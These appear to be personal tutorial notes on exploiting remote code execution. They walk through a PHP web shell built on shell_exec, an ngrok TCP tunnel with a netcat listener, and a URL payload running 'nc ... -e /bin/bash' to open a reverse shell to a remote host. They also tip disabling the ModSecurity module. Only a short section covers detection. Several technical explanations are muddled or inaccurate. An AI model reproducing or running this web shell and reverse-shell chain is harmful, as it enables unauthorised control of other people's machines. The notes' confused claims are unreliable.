= Exploiting RCE =

An RCE (Remote Code Execution) is the execution of your command on the enemies (victim) machine.

A reverse shell though, is an escalation of that, that is harder to detect, and that dumps itself as a file inside the memory and leaves there, and allows to expoit *multiple* commands, and not only one at a time. Also, it might be defined as a "connect-back" shell on the victim's machine, that redirects input/output to a remote machine (the attacker)

*Ngrok* is a very handy tool that can work as a kind of proxy, or maybe even client that can help you keep the traffic.

A dumb definition for Ngrok is "API first ingress as-a-servic". In easier words, it is just a simulation of an "API", which is really focused on *incoming traffic* (ingress). This also might mean that we can expose a local sercice to a DNS name reachable from the internet.

The connection is initiated from within the local network, to the outside.

== Let's exploit it! ==

First, we are going to fire up our Kali VM and create php file which will be sending our commands. Also do not forget to check if apache is up and running.

* Create a file called */var/www/html/rce.php* (this is directory for apache) with the following code:
{{{php
<?php
	$output = shell_exec($_GET["x"]);
	echo "<pre>$output</pre>";
?>
}}}
* Check again if *apache* is running by running:
{{{bash
sudo netstat -ntlp | grep apache2
}}}
* Create a free account on ngrok, and download it.
* Start the ngrok:
{{{bash
./ngrok http 80
}}}
* Then you will be able to see that there is a tunnel that will redirect any traffic - to our machine on port 80. Hence, go and test it in your browser whether you can access the standart site (http!).
* You can now stop the ngrok, because we will need to use the raw TCP connection for our exploit.
* Open 2 terminals, and:
	* In the first one (ngrok agent, as a raw tcp socket) run the:
	{{{bash
	./ngrok tcp 12345
	}}}
	* In the other one (a netcat listener) run the:
	{{{bash
	nc -lvp 12345
	}}}

What we got now, is a tunnel, an open site somewhere on ngrok servers, that will redirect traffic to our localhost, where we got our netcat (which is like capturing all the possible network that may come in)

We are lacking one more thing - a vulnerable website. Hence we navigate to our localhost and especially to our rce.php! The main URL parameter that we will be using for our code executions is just called "x".:
* It should look like this:
{{{
http://kali-address/rce.php?x=
}}}

We need to connect our website to our netcat service, hence we will do the next thing:
{{{
http://<kali-address>/rce.php?x=nc%20<ngrok-service>%20-e%20/bin/bash
}}}

This will allow us to link our website with our netcat and run /bash as the shell, and also it is important to notice the "-e" flag, and also the %20 in UTF-8/URL encoding which is just a space.

Small tip as I remember - if you want to run a command that does not want to get executed, you can try and run it from the /bin or /usr/bin, like /bin/cat file.txt 

After all of this, we should be able to see a new line appear in our netcat terminal, meaning we got someone on the bait.

And now, in your netcat terminal, you can run bash commands, and you will get the output from the computer of the victim!

=== Some more explanation: ===

So overall what is the idea

You are listening for your website send you shells!

Once a user goes to your website, you will make HIM, send you A SHELL. So it is like the user is just sending/offering you the shel (like go ahead, use it for me and etc)

=== More explanation upon how to run a reverse shell: ===

Afterwards you can run linux commands and get the information about your machine

Then inside the query (code is a query parameter) you can do `nc <url> <port>(same as the other netcat you ran) -e /bin/bash` `http://127.0.0.1/rce.php?code=nc localhost 8888 -e /bin/bash`
Then in your other terminal where you ran netcat, you should see that someone connected, and then you will be able to run shell commands straight from there.
You can as well use ngrok (which will mostly be just an API that is hosted and redirects traffic to another port you select, preferably the same as with netcat) `ngrok tcp <port>` and then in the query parameter, you will use the host and port from the *forwarding* section. That way you will be able to have RCE on the other PC's

*TIP*: Also a useful command should be 
{{{
sudo a2dismod security2
}}}

== How to detect it? ==

To detect the reverse-shell:

You need to know what the normal is. Afterwards you should go ahead and check ps aux and check for the apache2 processes. So for example there you can detect a child process from the apache2 that is basically a shell

